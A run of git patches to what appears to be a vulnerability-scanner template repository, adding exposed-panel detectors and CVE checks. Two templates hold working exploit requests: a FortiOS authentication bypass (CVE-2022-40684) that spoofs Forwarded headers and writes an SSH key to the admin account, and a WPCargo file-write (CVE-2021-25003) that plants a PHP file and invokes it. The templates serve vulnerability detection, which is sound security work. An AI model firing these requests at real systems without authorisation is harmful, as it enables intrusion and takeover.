From daf2c4b584a763493b49dbc6d9ae51fe2167fa90 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Fri, 14 Oct 2022 18:55:27 -0500 Subject: [PATCH 01/27] Update fortios-panel.yaml the modified changes did not accurately reflect the intent of the merge request. put the details back to reflect the intent of the merge request. --- exposed-panels/fortinet/fortios-panel.yaml | 37 ++++++++++++++++------ 1 file changed, 27 insertions(+), 10 deletions(-) diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index a1d04af8d5..274c08f1e5 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -1,32 +1,49 @@ id: fortios-panel info: - name: FortiOs Exposed Panel + name: fortios-panel author: canberbamber severity: info + description: | + admin portal of fortios devices + reference: + - https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ metadata: verified: true shodan-query: http.favicon.hash:945408572 tags: panel,fortinet,fortios + requests: - - method: GET - path: - - "{{BaseURL}}/remote/login?lang=en" + - raw: + - | + GET /api/v2/cmdb/system/admin/admin HTTP/1.1 + Host: {{Hostname}}:{{port}} + Content-Type: application/x-www-form-urlencoded + + attack: clusterbomb + payloads: + port: + - 443 + - 8443 + - 10443 + - 80 + - 4443 + - 9443 + - 6443 + - 7443 matchers-condition: and matchers: - type: word + part: body words: - - "Please Login" - - "Launch FortiClient" - condition: and - + - '/remote/login' - type: word part: header words: - - "text/html" + - 'Server: xxxxxxxx-xxxxx' - type: status status: - - 200 + - 403 From ec53ac2a339bf76addf7e123e1cc05d849ada30b Mon Sep 17 00:00:00 2001 From: canberbamber Date: Fri, 14 Oct 2022 19:00:53 -0500 Subject: [PATCH 02/27] Update fortios-panel.yaml --- exposed-panels/fortinet/fortios-panel.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index 274c08f1e5..773f256a2a 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -20,7 +20,6 @@ requests: GET /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: {{Hostname}}:{{port}} Content-Type: application/x-www-form-urlencoded - attack: clusterbomb payloads: port: @@ -32,7 +31,6 @@ requests: - 9443 - 6443 - 7443 - matchers-condition: and matchers: - type: word @@ -43,7 +41,6 @@ requests: part: header words: - 'Server: xxxxxxxx-xxxxx' - - type: status status: - 403 From b71e1f55300ba98ac97fb05e232bd935a3940bb5 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Sat, 15 Oct 2022 00:59:58 -0500 Subject: [PATCH 03/27] Update CVE-2022-40684.yaml fixed a metadata inconsistency. --- cves/2022/CVE-2022-40684.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 9e3673f294..c54235343e 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -13,7 +13,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 classification: cvss-score: 9.6 - cve-id: CVE-2022-27593 + cve-id: CVE-2022-40684 tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev requests: From 129df6323c786acacd4e02017821b3067d2e7167 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Sat, 15 Oct 2022 01:08:32 -0500 Subject: [PATCH 04/27] Update CVE-2022-40684.yaml added most common ports. --- cves/2022/CVE-2022-40684.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index c54235343e..17668b64b2 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -13,21 +13,21 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 classification: cvss-score: 9.6 - cve-id: CVE-2022-40684 + cve-id: CVE-2022-27593 tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev requests: - raw: - | GET /api/v2/cmdb/system/admin HTTP/1.1 - Host: {{Hostname}} + Host: {{Hostname}}:{{port}} User-Agent: Node.js Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= X-Forwarded-Vdom: root - | PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}} + Host: {{Hostname}}:{{port}} User-Agent: Report Runner Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; @@ -36,7 +36,17 @@ requests: { "ssh-public-key1":"{{randstr}}" } - + attack: clusterbomb + payloads: + port: + - 443 + - 8443 + - 10443 + - 80 + - 4443 + - 9443 + - 6443 + - 7443 stop-at-first-match: true req-condition: true matchers-condition: or From 51bc7f86d44372c835490eff8507a95383fa6505 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Sat, 15 Oct 2022 01:09:35 -0500 Subject: [PATCH 05/27] Update CVE-2022-40684.yaml --- cves/2022/CVE-2022-40684.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 17668b64b2..746663f227 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -13,7 +13,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 classification: cvss-score: 9.6 - cve-id: CVE-2022-27593 + cve-id: CVE-2022-40684 tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev requests: From 14c8505192a15d743c0e45a58a4e3bb263c1c063 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Thu, 20 Oct 2022 06:25:04 +0530 Subject: [PATCH 06/27] Added template for CVE-2021-25003 --- cves/2021/CVE-2021-25003.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-25003.yaml diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml new file mode 100644 index 0000000000..d77427b432 --- /dev/null +++ b/cves/2021/CVE-2021-25003.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-25003 + +info: + name: WPCargo < 6.9.0 - Unauthenticated RCE + author: theamanrawat + severity: critical + description: | + The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE. + reference: + - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a + - https://wordpress.org/plugins/wpcargo/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 + classification: + cve-id: CVE-2021-25003 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php" + - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=system" + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 200" + - "contains(body_2, 'PNG')" + condition: and \ No newline at end of file From 396af19348c0854304e7e36b6ce3a2dbe0898c6a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Oct 2022 13:12:32 +0530 Subject: [PATCH 07/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index d77427b432..29206d3044 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -14,18 +14,20 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauth requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php" - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=system" + req-condition: true matchers: - type: dsl dsl: + - "contains(all_headers_1, 'Content-Length: 0')" - "status_code_1 == 200" - "status_code_2 == 200" - "contains(body_2, 'PNG')" - condition: and \ No newline at end of file + condition: and From 0bdd0fa3ba98f584dabc5a87a61d4b5f552f35f9 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Sat, 22 Oct 2022 13:55:04 +0530 Subject: [PATCH 08/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 29206d3044..ff5af41d9f 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -14,20 +14,29 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauth + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + +variables: + num: "99999999" requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php" - - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=system" + - raw: + - | + GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 2={{md5(num)}} req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_1, 'Content-Length: 0')" - "status_code_1 == 200" - "status_code_2 == 200" - - "contains(body_2, 'PNG')" + - "contains(body_2, md5(num))" condition: and From 8328251daf64622ca446e485a2a118817c7b890d Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Sat, 22 Oct 2022 13:55:43 +0530 Subject: [PATCH 09/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index ff5af41d9f..1ba741ec5d 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauthenticated variables: num: "99999999" From 29a6e32142f87eded2772330dce05a89cf8a82d3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 27 Oct 2022 11:52:41 +0530 Subject: [PATCH 10/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 1ba741ec5d..7ed9b17282 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -16,7 +16,7 @@ info: verified: true tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauthenticated -variables: +variables: num: "99999999" requests: From ee96ef48ad183eec41802b71b9d53a11f1e710e2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 27 Oct 2022 19:57:41 +0530 Subject: [PATCH 11/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 7ed9b17282..3044be9cf5 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25003 info: - name: WPCargo < 6.9.0 - Unauthenticated RCE + name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution author: theamanrawat severity: critical description: | @@ -14,10 +14,10 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauthenticated + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpcargo,unauth variables: - num: "99999999" + num: "999999999" requests: - raw: @@ -39,4 +39,5 @@ requests: - "status_code_1 == 200" - "status_code_2 == 200" - "contains(body_2, md5(num))" + - "contains(body_2, 'PNG')" condition: and From 29618ff571c6fc67e7370ff70489903dc559007f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 28 Oct 2022 14:45:14 +0700 Subject: [PATCH 12/27] feat: added version detection geowebserver --- .../{geo-webserver.yaml => geowebserver-detect.yaml} | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) rename technologies/{geo-webserver.yaml => geowebserver-detect.yaml} (63%) diff --git a/technologies/geo-webserver.yaml b/technologies/geowebserver-detect.yaml similarity index 63% rename from technologies/geo-webserver.yaml rename to technologies/geowebserver-detect.yaml index 2b1ab6d373..1528249278 100644 --- a/technologies/geo-webserver.yaml +++ b/technologies/geowebserver-detect.yaml @@ -1,10 +1,11 @@ -id: geo-webserver +id: geowebserver-detect info: name: GeoWebServer Detector - author: dhiyaneshDK + author: dhiyaneshDK,daffainfo severity: info metadata: + verified: true shodan-query: http.title:"GeoWebServer" tags: panel,geowebserver @@ -22,3 +23,10 @@ requests: - type: word words: - "GeoWebServer" + + extractors: + - type: regex + part: header + group: 1 + regex: + - 'Server: GeoWebServer ([0-9.]+)' From 6e967e2d466be9b521c1578d826bbbfdc83afef4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Oct 2022 17:54:21 +0530 Subject: [PATCH 13/27] Update geowebserver-workflow.yaml --- workflows/geowebserver-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/geowebserver-workflow.yaml b/workflows/geowebserver-workflow.yaml index 6d2adff08f..cb43d1e509 100644 --- a/workflows/geowebserver-workflow.yaml +++ b/workflows/geowebserver-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target. workflows: - - template: technologies/geo-webserver.yaml + - template: technologies/geo-webserver-detect.yaml subtemplates: - - tags: geowebserver \ No newline at end of file + - tags: geowebserver From 9c2d4cc5c0f54ee68c3874252e624736c196bf65 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Oct 2022 17:55:26 +0530 Subject: [PATCH 14/27] Update and rename geowebserver-detect.yaml to geo-webserver-detect.yaml --- .../{geowebserver-detect.yaml => geo-webserver-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{geowebserver-detect.yaml => geo-webserver-detect.yaml} (95%) diff --git a/technologies/geowebserver-detect.yaml b/technologies/geo-webserver-detect.yaml similarity index 95% rename from technologies/geowebserver-detect.yaml rename to technologies/geo-webserver-detect.yaml index 1528249278..b40fea0ef5 100644 --- a/technologies/geowebserver-detect.yaml +++ b/technologies/geo-webserver-detect.yaml @@ -1,4 +1,4 @@ -id: geowebserver-detect +id: geo-webserver-detect info: name: GeoWebServer Detector From 022b1c79c209171dd5193ddcaa48d7a917ecc9a9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 4 Nov 2022 13:14:22 +0530 Subject: [PATCH 15/27] Create ourmgmt3-panel.yaml --- exposed-panels/ourmgmt3-panel.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/ourmgmt3-panel.yaml diff --git a/exposed-panels/ourmgmt3-panel.yaml b/exposed-panels/ourmgmt3-panel.yaml new file mode 100644 index 0000000000..a3681dcce1 --- /dev/null +++ b/exposed-panels/ourmgmt3-panel.yaml @@ -0,0 +1,26 @@ +id: ourmgmt3-panel + +info: + name: OurMGMT3 Admin Panel + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: http.title:"OurMGMT3" + tags: panel,ourmgmt3 + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'OurMGMT3 Debug client' + + - type: status + status: + - 200 From 5af91e6aeb214c89cc4bfdc427f9c8766402bab8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 4 Nov 2022 13:15:57 +0530 Subject: [PATCH 16/27] Update ourmgmt3-panel.yaml --- exposed-panels/ourmgmt3-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/ourmgmt3-panel.yaml b/exposed-panels/ourmgmt3-panel.yaml index a3681dcce1..18a5db8b3a 100644 --- a/exposed-panels/ourmgmt3-panel.yaml +++ b/exposed-panels/ourmgmt3-panel.yaml @@ -12,8 +12,10 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/admin/login' + stop-at-first-match: true matchers-condition: and matchers: - type: word From 036b41d49b7fff81e22925494a5e6cc1ef5ea8f4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Nov 2022 09:36:13 +0000 Subject: [PATCH 17/27] Auto Generated New Template Addition List [Fri Nov 4 09:36:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a25bae0cc2..af4e0b3ae3 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/labkey-server-login.yaml exposed-panels/nginx-admin-panel.yaml exposed-panels/nginx-ui-dashboard.yaml exposed-panels/nport-web-console.yaml +exposed-panels/ourmgmt3-panel.yaml exposed-panels/xiaomi-wireless-router-login.yaml exposed-panels/xnat-login.yaml misconfiguration/ampache-update-exposure.yaml From 5a33e1b9adbef49ca9a199ca3be30e0b6e1ac2b9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 15:38:24 +0530 Subject: [PATCH 18/27] Update CVE-2022-40684.yaml --- cves/2022/CVE-2022-40684.yaml | 16 +++------------- 1 file changed, 3 insertions(+), 13 deletions(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 746663f227..c54235343e 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -20,14 +20,14 @@ requests: - raw: - | GET /api/v2/cmdb/system/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} + Host: {{Hostname}} User-Agent: Node.js Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= X-Forwarded-Vdom: root - | PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} + Host: {{Hostname}} User-Agent: Report Runner Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; @@ -36,17 +36,7 @@ requests: { "ssh-public-key1":"{{randstr}}" } - attack: clusterbomb - payloads: - port: - - 443 - - 8443 - - 10443 - - 80 - - 4443 - - 9443 - - 6443 - - 7443 + stop-at-first-match: true req-condition: true matchers-condition: or From 853044115dd88fccb4880721ce28c41222212355 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 15:50:51 +0530 Subject: [PATCH 19/27] Update fortios-panel.yaml --- exposed-panels/fortinet/fortios-panel.yaml | 21 ++++++--------------- 1 file changed, 6 insertions(+), 15 deletions(-) diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index 773f256a2a..0f530b480b 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -1,8 +1,8 @@ id: fortios-panel info: - name: fortios-panel - author: canberbamber + name: Fortios Exposed Panel + author: canberbamber,Jna1 severity: info description: | admin portal of fortios devices @@ -18,29 +18,20 @@ requests: - raw: - | GET /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} - Content-Type: application/x-www-form-urlencoded - attack: clusterbomb - payloads: - port: - - 443 - - 8443 - - 10443 - - 80 - - 4443 - - 9443 - - 6443 - - 7443 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: body words: - '/remote/login' + - type: word part: header words: - 'Server: xxxxxxxx-xxxxx' + - type: status status: - 403 From f11260b883dd1d9e526422f8c09e702302f64188 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 16:10:17 +0530 Subject: [PATCH 22/27] Update key-cloak-admin-panel.yaml --- exposed-panels/key-cloak-admin-panel.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 3b757d7c18..e4bead4885 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -4,6 +4,9 @@ info: name: Keycloak Admin Panel author: incogbyte,righettod severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:-1105083093 tags: panel,keycloak requests: @@ -12,13 +15,18 @@ requests: - "{{BaseURL}}/auth/admin/master/console/" - "{{BaseURL}}/auth/admin" + stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word + part: body words: - "" - "keycloak" - part: body condition: or + + - type: status + status: + - 200 From 5c32b7ed3db2f9b8ec06dae37ab71bb18d9606e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 16:20:41 +0530 Subject: [PATCH 24/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 3044be9cf5..5e9a4530b1 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -21,6 +21,10 @@ variables: requests: - raw: + - | + GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + - | GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -36,8 +40,9 @@ requests: matchers: - type: dsl dsl: - - "status_code_1 == 200" + - "status_code_1 != 200" - "status_code_2 == 200" - - "contains(body_2, md5(num))" - - "contains(body_2, 'PNG')" + - "status_code_3 == 200" + - "contains(body_3, md5(num))" + - "contains(body_3, 'PNG')" condition: and From 4c35bd16380643afbeeebc8f90c8e38bcae6afaf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Nov 2022 11:05:52 +0000 Subject: [PATCH 25/27] Auto Generated New Template Addition List [Fri Nov 4 11:05:52 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index af4e0b3ae3..fbd7e1f691 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2021/CVE-2021-25003.yaml cves/2021/CVE-2021-40661.yaml cves/2022/CVE-2022-22242.yaml cves/2022/CVE-2022-38870.yaml From c564beb92b2ba3f316aa436f8ab4574ecfd4a7b4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Nov 2022 11:24:29 +0000 Subject: [PATCH 27/27] Auto Generated CVE annotations [Fri Nov 4 11:24:29 UTC 2022] :robot: --- cves/2021/CVE-2021-25003.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 5e9a4530b1..05739f4468 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/wpcargo/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-25003 + cwe-id: CWE-434 metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpcargo,unauth + verified: "true" + tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan variables: num: "999999999"